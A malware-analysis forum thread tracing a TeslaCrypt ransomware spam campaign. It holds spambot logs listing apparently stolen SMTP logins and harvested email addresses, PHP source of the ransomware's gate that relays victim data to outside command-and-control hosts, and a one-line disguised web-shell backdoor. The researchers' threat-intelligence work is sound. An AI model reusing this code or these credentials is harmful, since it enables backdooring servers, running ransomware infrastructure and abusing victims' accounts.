A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27834  by benkow_
 Sun Feb 07, 2016 7:34 pm
Teslacrypt spammer

http://cybercrime-tracker.net/index.php ... 47.198.134 -> spammer panel.
Code: Select all
http://78.47.198.134/1.exe
spammer bot: https://www.virustotal.com/fr/file/6aa5 ... /analysis/
This bot seems to retrives informations from:
Code: Select all
(direcotry listing allowed)
http://78.47.198.134/go_mails/*****.txt -> Emails to spam
http://78.47.198.134/header/name.txt -> fake info for email crafting
http://78.47.198.134/go_attach/*****.zip -> payloads (teslacrypt dropper (JS)
the bot write some logs:
Code: Select all
[01:43:43:774] - Server address : http://78.47.198.134/
[01:43:44:825] - Status posted : 0
[01:43:47:569] - Received : 3
16
smtp.netvigator.com@joecat@netvigator.com:d30857	out.alice.it@casa886@alice.it:casa86	smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123	smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm	smtp.poczta.onet.pl@katarzyna.kosinska@onet.pl:didl12	
http://78.47.198.134/go_mails/botid-1073_1222.txt
http://78.47.198.134/header/name.txt
http://78.47.198.134/go_attach/invoice_A5twhy.zip
[ID:7680938-8849].zip
Microsoft Outlook Express {1|2|3}

1000
[ID:803801] To compensate for the inconvenience caused a partial refund is applied.
This is our payment for the last unpaid purchase. Attached below you will find additional information.
[01:43:47:569] - Spam cmd
[01:43:47:569] - Spam : servers (first 5 lines, total - 6) :
[01:43:47:569] -     smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:47:569] -     out.alice.it@casa886@alice.it:casa86
[01:43:47:569] -     smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:47:569] -     smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm
[01:43:47:569] -     smtp.poczta.onet.pl@katarzyna.kosinska@onet.pl:didl12
[01:43:47:799] - Spam : emails (first 5 lines, total - 5000) :
[01:43:47:799] -     buffalowings37@yahoo.com
[01:43:47:799] -     buffalowings48@yahoo.com
[01:43:47:799] -     buffalowinter61@hotmail.com
[01:43:47:799] -     buffalowinter@gmail.com
[01:43:47:799] -     buffalowjoe@netzero.net
[01:43:47:990] - Spam : mailfrom (first 5 lines, total - 4612) :
[01:43:47:990] -     Charyl	Tady
[01:43:47:990] -     Julita	Harp
[01:43:47:990] -     Dara	Schutt
[01:43:47:990] -     Andi	Lopez
[01:43:47:990] -     Sherman	Casias
[01:43:48:130] - Status posted : 3
[01:43:48:130] - Spam : start
[01:43:48:190] - Spam (3888) : srv (1) : smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:48:200] - Spam (3900) : srv (2) : smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:48:200] - Spam (3864) : srv (3) : smtp.netvigator.com@joecat@netvigator.com:d30857
[01:43:48:210] - Spam (3876) : srv (1) : out.alice.it@casa886@alice.it:casa86
[01:43:48:220] - Spam (3904) : srv (2) : out.alice.it@casa886@alice.it:casa86
[01:43:48:220] - Spam (3916) : srv (3) : out.alice.it@casa886@alice.it:casa86
[01:43:48:230] - Spam (3920) : srv (1) : smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:48:230] - Spam (3912) : srv (2) : smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:48:250] - Spam (3932) : srv (3) : smtp.ibatistabetel.org.br@recepcao@ibatistabetel.org.br:recepcao123
[01:43:48:250] - Spam (3896) : srv (1) : smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm
[01:43:48:270] - Spam (3936) : srv (2) : smtp.wanadoo.fr@delfin.sim@wanadoo.fr:rosefm
etc ...
JS Dropper: https://www.virustotal.com/fr/file/e746 ... /analysis/
Teslacrypt sample: https://www.virustotal.com/fr/file/4519 ... /analysis/

spambot + some JS dropper + Teslacrypt sample attached
You do not have the required permissions to view the files attached to this post.
 #27836  by sysopfb
 Sun Feb 07, 2016 10:42 pm
The spam panel being used is called Spamm Panel

There is a demo up at htxp://spmsmtcheckrgb.com/index.php
 #27952  by benkow_
 Sun Feb 28, 2016 7:33 pm
I'm working on web part of ransomware.
So, TeslaCrypt gate (mzsys.php/dbsys.php/bstr.php etc):
Code: Select all
<?php
$network = ip2long("23.96.0.0");
$mask = ip2long("255.248.0.0");
$remote = ip2long($_SERVER['REMOTE_ADDR']);

if (($remote & $mask) == $network)
    {
    header("Location: http://google.com");
    exit;
    }

set_time_limit(300);

if (!isset($_POST['data']))
    {
    die("empty post");
    }

$post = array(
    'data' => $_POST['data'],
    'IP' => $_SERVER['REMOTE_ADDR'],
    'SHELL' => $_SERVER['SERVER_NAME'],
);
$gate = array(
    "http://perc54hg47fhnkjnfvcdgvdc.clinkjuno.com/ing.php",
    "http://yy46bdff329hfbcjhbme2f.evertmazic.com/ing.php",
    "http://dd7bsndhr45nfksdnkferfer.javakale.at/ing.php",
);
$fp = fopen("most.txt", "a+");
fwrite($fp, 'data=' . $_POST['data'] . ' IP=' . $_SERVER['REMOTE_ADDR'] . ' SHELL=' . $_SERVER['SERVER_NAME'] . "\n");
fclose($fp);

foreach($gate as $value)
    {
    $process = curl_init();
    curl_setopt($process, CURLOPT_URL, $value);
    curl_setopt($process, CURLOPT_POST, 1);
    curl_setopt($process, CURLOPT_POSTFIELDS, $post);
    curl_setopt($process, CURLOPT_RETURNTRANSFER, true);
    if (!$result = curl_exec($process))
        {
        continue;
        }

    if (stristr($result, "work:"))
        {
        echo $result;
        curl_close($process);
        die();
        }

    if (stristr($result, "INSERTED"))
        {
        echo $result;
        curl_close($process);
        die();
        }

    curl_close($process);
    } ?>
 #27965  by benkow_
 Mon Feb 29, 2016 6:48 pm
Here we go,
web kit of TeslaCrypt:
On each Teslacrypt callback ex: http://XXXXX.com/csys.php you can find:
csys.php -> gate:
Code: Select all
    <?php
    $network=ip2long("23.96.0.0");
    $mask=ip2long("255.248.0.0");
    $remote=ip2long($_SERVER['REMOTE_ADDR']);
    if (($remote & $mask)==$network){
        header("Location: http://google.com");
        exit;
    }
    if(!isset($_POST['data'])){        die("empty post");     }
    $post = array('data'=>$_POST['data'], 'IP'=>$_SERVER['REMOTE_ADDR'], 'SHELL'=>$_SERVER['SERVER_NAME'],);

    $gate = array(

        "http://rr7mdgjbjhbefvkhbashrg.ginnypecht.com/ing.php",
        "http://ert54nfh6hdshbw4f.nursespelk.com/ing.php",
        "http://kk4dshfjn45tsnkdf34fg.tatiejava.at/ing.php",
        "http://nn54djhfnrnm4dnjnerfsd.replylaten.at/ing.php",
    );                                                                                                                                                                                                        $fp = fopen("images/most47.txt", "a+");    fwrite($fp, 'data='.$_POST['data'].' IP='.$_SERVER['REMOTE_ADDR'].' SHELL='.$_SERVER['SERVER_NAME']."\n");    fclose($fp);


    foreach( $gate as $value ) 
    {
        $process = curl_init();
        curl_setopt($process, CURLOPT_URL, $value);
        curl_setopt($process, CURLOPT_POST, 1);
        curl_setopt($process, CURLOPT_POSTFIELDS,$post);
        curl_setopt($process, CURLOPT_RETURNTRANSFER, true);
        if( ! $result = curl_exec($process)) {
            continue;
        }
         if(stristr($result,"work:")){
                echo $result;
                curl_close($process);
                die();
        }
        if(stristr($result,"INSERTED")){
                echo $result;
                curl_close($process);
                die();
        }
        curl_close($process);
    }
    ?> 
a file cron.php:
Code: Select all

     <?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?> 

 #27979  by kaze0
 Wed Mar 02, 2016 12:11 pm
Btw the spamming bot is also called Bruteres aka Trubsil aka Fidobot. It was used by Dridex to send Dridex spam back in October 2015.
 #27980  by benkow_
 Wed Mar 02, 2016 2:00 pm
kaze0 wrote:Btw the spamming bot is also called Bruteres aka Trubsil aka Fidobot. It was used by Dridex to send Dridex spam back in October 2015.
Thx for the tips. I've call it Bombila because of the word a the top left of the admin panel: бомбила
Image

and the creds of the panel:
Code: Select all
$mysql['user'] = 'bombila';
$mysql['pass'] = 'bombila';
$mysql['db'] = 'bombila';
  • 1
  • 3
  • 4
  • 5
  • 6
  • 7